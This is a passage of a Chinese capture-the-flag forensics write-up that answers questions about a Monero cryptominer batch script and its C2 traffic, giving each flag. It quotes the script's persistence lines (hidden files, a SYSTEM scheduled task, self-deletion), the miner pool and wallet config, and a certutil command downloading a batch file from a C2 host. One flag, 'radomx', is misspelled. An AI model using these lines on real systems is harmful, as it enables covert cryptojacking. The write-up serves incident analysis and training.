attrib +h "%f%" >nul 2>&1

schtasks /create /tn "%a%" /tr "cmd /c %e%" /sc hourly /mo 2 /st 02:00 /f /ru SYSTEM /rl HIGHEST >nul 2>&1

ping -n 3 127.0.0.1 >nul 2>&1
start /b "" cmd /c "%e%" >nul 2>&1

del /f /q "%~f0" >nul 2>&1

后面几题就都出来了,本题答案

1
set "a=WindowsRuntimePlatformUpdate"

flag{WindowsRuntimePlatformUpdate}

44.该挖矿脚本连接的矿池地址和端口是什么?(格式:地址:端口)

1
2
set "b=xmr.cryptonight-hub.com"
"url":"%b%:443","

flag{xmr.cryptonight-hub.com:443}

45.该挖矿脚本挖掘的是什么加密货币?

1
{"algo":null,"coin":"monero","url":"%b%:443","user":"49XnPvDkmNQSPBGKEgTRpnHfv7PZiEMVzDGmNcLHn5FyLYuFmJRLBAwMbBF1fQRHGpzCwp9hHt6NsfrSPeXQqzqZRa1p2aZ","pass":"RTPlatformSvc","tls":true,"keepalive":true,"daemon":false}]})>"%f%"

答案在”coin”:”monero”

flag{monero}

46.挖矿脚本使用的挖矿算法是什么?

1
randomx:{"mode":"auto","1gb-pages":false,"rdmsr":true,"wrmsr":true,"numa":true}

使用的算法是randomx,后面的是参数

flag{radomx}

47.挖矿程序使用的钱包地址是什么?

“user”:”49XnPvDkmNQSPBGKEgTRpnHfv7PZiEMVzDGmNcLHn5FyLYuFmJRLBAwMbBF1fQRHGpzCwp9hHt6NsfrSPeXQqzqZRa1p2aZ”

flag{49XnPvDkmNQSPBGKEgTRpnHfv7PZiEMVzDGmNcLHn5FyLYuFmJRLBAwMbBF1fQRHGpzCwp9hHt6NsfrSPeXQqzqZRa1p2aZ}

48.挖矿配置中的worker密码(pass字段)是什么?

同上,flag{RTPlatformSvc}

49.挖矿脚本将自身和配置文件安装到哪个目录?(使用环境变量表示)

1
set "d=%APPDATA%\Microsoft\Windows\RuntimePlatform"

flag{%APPDATA%\Microsoft\Windows\RuntimePlatform}

50.该计划任务设置的执行频率是什么?(每隔多少小时执行一次)

1
schtasks /create /tn "%a%" /tr "cmd /c %e%" /sc hourly /mo 2 /st 02:00 /f /ru SYSTEM /rl HIGHEST

·/mo 2`:间隔 2 个小时

flag{2}

51.挖矿脚本使用了什么技术来隐藏自身文件?

bat中大量使用

1
attrib +h 目标文件/文件夹

给文件添加隐藏属性

flag{attrib +h}

52.攻击者通过 C2 下载挖矿脚本时,使用的 Windows 内置下载命令及参数前缀是什么?(格式:flag{命令 参数1 参数2 参数3 参数4})

下载脚本的命令是

1
certutil -urlcache -split -f http://192.168.39.88:8888/WindowsUpdate.bat C:\Users\yue\Downloads\WindowsUpdate.bat

flag{certutil -urlcache -split -f}

53.在所有邮件往来中,攻击者用于投递恶意程序的IP地址与C2控制端的IP地址是否是同一个?如果是,该IP是多少?

微步云沙箱分析的恶意程序目的地址为192.168.39.88

image-20260724152409670

与c2控制端一致

flag{192.168.39.88}

54.从邮件投递到C2上线,受害主机发起C2连接的源IP是哪个?

整个过程是192.168.39.152->192.168.39.88之间的通信流量,因此ip为192.168.39.152

flag{192.168.39.152}

55.在C2通信流量中,一共捕获到了多少个心跳包(POST /s请求)?

1
http.request.method == "POST" && http.request.uri == "/s"

image-20260724151737003

flag{689}

56.受害者主机名为WIN-5CNHCFAIMP9,该主机使用了多少块网卡?

在tcp246返回了受害机的系统信息

image-20260724151459537

有4个网卡

flag{4}